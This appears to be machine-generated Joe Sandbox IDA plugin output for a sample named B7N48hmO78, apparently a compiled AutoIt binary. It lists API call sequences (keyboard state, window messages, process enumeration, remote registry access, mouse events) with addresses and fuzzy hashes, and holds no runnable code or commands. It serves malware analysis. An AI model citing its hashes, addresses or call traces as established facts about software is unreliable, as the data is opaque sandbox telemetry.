• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
• Opcode ID: 5a384ba09bd9194df64896037848493d99d40b223e96484c3f79da4ce3f3fe95
• Instruction ID: 089ef2fd6bca5edd8ca01e487b85ede62a2592a64abfadd5678a69bc346ee29b
• Opcode Fuzzy Hash: 5a384ba09bd9194df64896037848493d99d40b223e96484c3f79da4ce3f3fe95
• Instruction Fuzzy Hash: A8718A74A006199FCF04EFA5D8819AEBBF5FF48310F508459E956BB3A1CB30AD40CBA4
APIs
• GetParent.USER32(00000000), ref: 00E23C02
• GetKeyboardState.USER32(?), ref: 00E23C17
• SetKeyboardState.USER32(?), ref: 00E23C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E23CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E23CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E23D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E23D26
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 5563fdad9223407501f0c54a35991d302a7f780fed6218bf56b030aa741fc429
• Instruction ID: 303287d2a094a3765c46f3074df9278fc9f11c4444668ed44a0644608ae52661
• Opcode Fuzzy Hash: 5563fdad9223407501f0c54a35991d302a7f780fed6218bf56b030aa741fc429
• Instruction Fuzzy Hash: 9D510AA06047E53DFB328734DC46B76BF996B06308F0C9489E1D5768C2D698EE94EB60
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E48FE7
• GetWindowLongW.USER32(01089320,000000F0), ref: 00E4901A
• GetWindowLongW.USER32(01089320,000000F0), ref: 00E4904F
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E49081
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E490AB
• GetWindowLongW.USER32(00000000,000000F0), ref: 00E490BC
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E490D6
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 80c1fa923a17a6ed43e182f1ac7b4a349a234aa1412aacd4f5f7669f5592cda3
• Instruction ID: 41956edf7d41a4bfd4c7d245fa528e652cb8d61d1563554d63d9bb9d349cef41
• Opcode Fuzzy Hash: 80c1fa923a17a6ed43e182f1ac7b4a349a234aa1412aacd4f5f7669f5592cda3
• Instruction Fuzzy Hash: 603134347042149FDB218F59EC84F6A37A5FB8A358F1451A4F619EB2B2CBB1AC44DB41
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E208F2
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E20918
• SysAllocString.OLEAUT32(00000000), ref: 00E2091B
• SysAllocString.OLEAUT32(?), ref: 00E20939
• SysFreeString.OLEAUT32(?), ref: 00E20942
• StringFromGUID2.COMBASE(?,?,00000028), ref: 00E20967
• SysAllocString.OLEAUT32(?), ref: 00E20975
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 20f54b597549bf579d2404cfb55ded334f88a356d7f19ead3eb62bb6189515e8
• Instruction ID: 5e75f86635701d072a4c77d92b4d3172e54e866655ff413141dcd7a11678e3f3
• Opcode Fuzzy Hash: 20f54b597549bf579d2404cfb55ded334f88a356d7f19ead3eb62bb6189515e8
• Instruction Fuzzy Hash: F321C972605218AFDB109F79EC88DBB73ACEF49364B408125F915EB192D670EC45C760
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: a005ddcc71bc26f530856807605f1c8753e9604ae4adc6987a77c74fec8e413a
• Instruction ID: 00f95b63f4ccbc50dfab329ee72b180be626f72b76b3a9dc536b9aa3074475ac
• Opcode Fuzzy Hash: a005ddcc71bc26f530856807605f1c8753e9604ae4adc6987a77c74fec8e413a
• Instruction Fuzzy Hash: E7216A3124423577C330BA24AD02FB773D9EF64304F54E42EF646B7181E7559982C2B5
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E209CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E209F1
• SysAllocString.OLEAUT32(00000000), ref: 00E209F4
• SysAllocString.OLEAUT32 ref: 00E20A15
• SysFreeString.OLEAUT32 ref: 00E20A1E
• StringFromGUID2.COMBASE(?,?,00000028), ref: 00E20A38
• SysAllocString.OLEAUT32(?), ref: 00E20A46
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 52e5a6ec2efefacf4028720b17a8a2a31dc4c34a459dff8c1106ec97e7282586
• Instruction ID: 3c6012b0a729ea6ff7b156380c800c929dec674148f84ae9cddc830e5ff57b7a
• Opcode Fuzzy Hash: 52e5a6ec2efefacf4028720b17a8a2a31dc4c34a459dff8c1106ec97e7282586
• Instruction Fuzzy Hash: F6217475604214AFDB109FA9EC88DAB77ECEF483647808125F919EB2A1DAB0EC458764
APIs
  • Part of subcall function 00DFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DFD1BA
  • Part of subcall function 00DFD17C: GetStockObject.GDI32(00000011), ref: 00DFD1CE
  • Part of subcall function 00DFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFD1D8
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E4A32D
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E4A33A
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E4A345
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E4A354
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E4A360
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: b06f53ea8ed17b44dbe31328229ebb835e3f3da38f9db7df4ec012c4ff0c3d58
• Instruction ID: d14d7f9a797df95308a67155c3f40938ac23ef128c79f0d751eab409163d8a13
• Opcode Fuzzy Hash: b06f53ea8ed17b44dbe31328229ebb835e3f3da38f9db7df4ec012c4ff0c3d58
• Instruction Fuzzy Hash: 1311D0B1140219BEEF108F61DC85EEB7F6DFF083A8F014114FA08A60A0C672AC21DBA4
APIs
• GetClientRect.USER32(?,?), ref: 00DFCCF6
• GetWindowRect.USER32(?,?), ref: 00DFCD37
• ScreenToClient.USER32(?,?), ref: 00DFCD5F
• GetClientRect.USER32(?,?), ref: 00DFCE8C
• GetWindowRect.USER32(?,?), ref: 00DFCEA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1296646539-0
                                                                                                                  • Opcode ID: f5f38b4dc89d1b4b857434655ec9efb784e3deedc3b3edc39293b6951c9fed92
                                                                                                                  • Instruction ID: f477bc766899e6def76509ae5ef338a5485f20c2b983a98a8d45761f42aece51
                                                                                                                  • Opcode Fuzzy Hash: f5f38b4dc89d1b4b857434655ec9efb784e3deedc3b3edc39293b6951c9fed92
                                                                                                                  • Instruction Fuzzy Hash: 86B17D7991024DDBDB14CFA8C9807EDB7B1FF08340F15E529ED99AB250DB30AA54CB64
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00E41C18
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00E41C26
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E41C54
                                                                                                                    • Part of subcall function 00E01DFC: __wsplitpath_helper.LIBCMT ref: 00E01E3C
                                                                                                                  • _wcscat.LIBCMT ref: 00E41C69
                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00E41CDF
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00E41CF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1380811348-0
                                                                                                                  • Opcode ID: 8593c0b1a3b65c49496b23aac635c129ee0b91ef779b0927e23210b3806992f0
                                                                                                                  • Instruction ID: 17330a9c22931e797e32296f8bb4fe17abbfc880eb379645968bb790ddeb3540
                                                                                                                  • Opcode Fuzzy Hash: 8593c0b1a3b65c49496b23aac635c129ee0b91ef779b0927e23210b3806992f0
                                                                                                                  • Instruction Fuzzy Hash: 8A518CB15083449FD720EF25DC85EABB7E8EF88754F00491EF585A7291EB70DA05CBA2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E42BB5,?,?), ref: 00E43C1D
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E430AF
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E430EF
                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E43112
                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E4313B
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E4317E
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E4318B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3451389628-0
                                                                                                                  • Opcode ID: 449c928a70be871192631b5351ba3c120d3c8f85195cfac8046bb574dad63eeb
                                                                                                                  • Instruction ID: eeedf1d5b2d563df237e3b959ced1a8f893f00eb6c34dfb6cb12d7ad64a924ce
                                                                                                                  • Opcode Fuzzy Hash: 449c928a70be871192631b5351ba3c120d3c8f85195cfac8046bb574dad63eeb
                                                                                                                  • Instruction Fuzzy Hash: 1F515631608340AFC714EF65DC85E6ABBE9FF88304F04491DF545A72A1DB71EA09CBA2
                                                                                                                  APIs
                                                                                                                  • GetMenu.USER32(?), ref: 00E48540
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00E48577
                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E4859F
                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00E4860E
                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00E4861C
                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E4866D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 650687236-0
                                                                                                                  • Opcode ID: 381b128037a6a71ddfcb5631a19d0dfefcfecd7a09625fb85e7bb226fb064a0c
                                                                                                                  • Instruction ID: 3d064291f5cbfafea8a4ea84b5f6ab2b07ee45b919f6cb6f658c70bd41db1d76
                                                                                                                  • Opcode Fuzzy Hash: 381b128037a6a71ddfcb5631a19d0dfefcfecd7a09625fb85e7bb226fb064a0c
                                                                                                                  • Instruction Fuzzy Hash: 1951AE31E00218AFCF11EF65DA41AAEB7F4FF48710F115499E916BB351CB74AE418BA0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E24B10
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E24B5B
                                                                                                                  • IsMenu.USER32(00000000), ref: 00E24B7B
                                                                                                                  • CreatePopupMenu.USER32 ref: 00E24BAF
                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00E24C0D
                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E24C3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3311875123-0
                                                                                                                  • Opcode ID: 6b328018a6dd51e746759531c99bdfece2248ed0b50630de27d04600959fa844
                                                                                                                  • Instruction ID: c22d53833f692f6707319be5de6d2b0c4677a59f6cae853021f9e2d5fdbc6194
                                                                                                                  • Opcode Fuzzy Hash: 6b328018a6dd51e746759531c99bdfece2248ed0b50630de27d04600959fa844
                                                                                                                  • Instruction Fuzzy Hash: A251CFB0A01369EFEF20CF68E889BAEBBF4AF44318F145159E415BB2D1D3B09944CB51
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • BeginPaint.USER32(?,?,?), ref: 00DFAC2A
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DFAC8E
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00DFACAB
                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DFACBC
                                                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 00DFAD06
                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00E5E673
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2592858361-0
                                                                                                                  • Opcode ID: 8aaeebf5fcbdb83c12aaf7e6b8bbe2ec886996cd5bcb321a5b90d975ee0d829d
                                                                                                                  • Instruction ID: 9f5204c35ffb72fd732378b9fc1ac6a2f3ab987e081a460de9349931be3757a6
                                                                                                                  • Opcode Fuzzy Hash: 8aaeebf5fcbdb83c12aaf7e6b8bbe2ec886996cd5bcb321a5b90d975ee0d829d
                                                                                                                  • Instruction Fuzzy Hash: 9341D3B05043059FC710DF19DC84F7B7BE8EB5A360F084659FAA8972A1C770A948DB72
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00EA1628,00000000,00EA1628,00000000,00000000,00EA1628,?,00E5DC5D,00000000,?,00000000,00000000,00000000,?,00E5DAD1,00000004), ref: 00E4E40B
                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00E4E42F
                                                                                                                  • ShowWindow.USER32(00EA1628,00000000), ref: 00E4E48F
                                                                                                                  • ShowWindow.USER32(00000000,00000004), ref: 00E4E4A1
                                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 00E4E4C5
                                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E4E4E8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 17d5eb17be4da835389d77e9592d21b42b56ce5ed89eadb8fd6e25bfeca2daff
• Instruction ID: f69cb1b6de8d3d31ef6dfa6a5a0fc990f823ab34595406a00ba2b79054e99d2c
• Opcode Fuzzy Hash: 17d5eb17be4da835389d77e9592d21b42b56ce5ed89eadb8fd6e25bfeca2daff
• Instruction Fuzzy Hash: D0418230601140EFDB22CF24E899B947BE1FF09318F5951B9EA69AF3A2C771E845CB51
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00E298D1
  • Part of subcall function 00DFF4EA: std::exception::exception.LIBCMT ref: 00DFF51E
  • Part of subcall function 00DFF4EA: __CxxThrowException@8.LIBCMT ref: 00DFF533
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E29908
• RtlEnterCriticalSection.NTDLL(?), ref: 00E29924
• RtlLeaveCriticalSection.NTDLL(?), ref: 00E2999E
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E299B3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00E299D2
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 2537439066-0
• Opcode ID: f9d537f6bcd1ed0da7a275d78a8b99f53eb52fcde22af931bfb8fb555229cce5
• Instruction ID: 95372bd54a5c071da081ad073f9238d6887e515df9976cf8cdc595a8f066cf0c
• Opcode Fuzzy Hash: f9d537f6bcd1ed0da7a275d78a8b99f53eb52fcde22af931bfb8fb555229cce5
• Instruction Fuzzy Hash: 45318F31A00115AFDB00AFA5EC85EAFB7B8FF85710F1580A9F904AB256D774DA14CBB0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00E377F4,?,?,00000000,00000001), ref: 00E39B53
  • Part of subcall function 00E36544: GetWindowRect.USER32(?,?), ref: 00E36557
• GetDesktopWindow.USER32 ref: 00E39B7D
• GetWindowRect.USER32(00000000), ref: 00E39B84
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E39BB6
  • Part of subcall function 00E27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27AD0
• GetCursorPos.USER32(?), ref: 00E39BE2
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E39C44
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: fc968b5b33d9c846d7023d031967ea547b6e857ded01445da4aeb050b68fef62
• Instruction ID: 73867867ee9840ec37103dcf1abd5cc4a0f1db82f0083443b1a34d70b5ff9997
• Opcode Fuzzy Hash: fc968b5b33d9c846d7023d031967ea547b6e857ded01445da4aeb050b68fef62
• Instruction Fuzzy Hash: C031C272608315AFD710DF15EC49A9BBBE9FF88354F00191AF585E7182D7B1E908CB91
APIs
  • Part of subcall function 00DFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DFAFE3
  • Part of subcall function 00DFAF83: SelectObject.GDI32(?,00000000), ref: 00DFAFF2
  • Part of subcall function 00DFAF83: BeginPath.GDI32(?), ref: 00DFB009
  • Part of subcall function 00DFAF83: SelectObject.GDI32(?,00000000), ref: 00DFB033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E4EC20
• LineTo.GDI32(00000000,00000003,?), ref: 00E4EC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E4EC42
• LineTo.GDI32(00000000,00000000,?), ref: 00E4EC52
• EndPath.GDI32(00000000), ref: 00E4EC62
• StrokePath.GDI32(00000000), ref: 00E4EC72
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 0ad9d10ed2d530776fb5c10053915f2552b353104dd3aa034194df91abbf9675
• Instruction ID: 8e67cf3161f21e481bb2e99bb9f1ba4425d84fbd05ec4cbdeebf2f4806597fb3
• Opcode Fuzzy Hash: 0ad9d10ed2d530776fb5c10053915f2552b353104dd3aa034194df91abbf9675
• Instruction Fuzzy Hash: 0211F772504149BFEB029F91ED88EEA7F6DEB08394F048112FE18A9160D7B19D599BA0
APIs
• GetDC.USER32(00000000), ref: 00E1E1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00E1E1D1
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E1E1D8
• ReleaseDC.USER32(00000000,00000000), ref: 00E1E1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E1E1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 00E1E209
  • Part of subcall function 00E19AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00E19A05,00000000,00000000,?,00E19DDB), ref: 00E1A53A
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
• Opcode ID: 170193e4be13bd920c527eea222e885824bc323c9cd6723169464abe76be29d4
• Instruction ID: 9de2dcf62287beef7beef210550a1edde6c6203142c75115f9c71374db9e2d04
• Opcode Fuzzy Hash: 170193e4be13bd920c527eea222e885824bc323c9cd6723169464abe76be29d4
• Instruction Fuzzy Hash: 0A0171B5F00214BFEB109BA69C45B5EBFB9EB48351F004066EE04B7390D6B09C048B60
APIs
• __init_pointers.LIBCMT ref: 00E07B47
  • Part of subcall function 00E0123A: __initp_misc_winsig.LIBCMT ref: 00E0125E
  • Part of subcall function 00E0123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E07F51
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E07F65
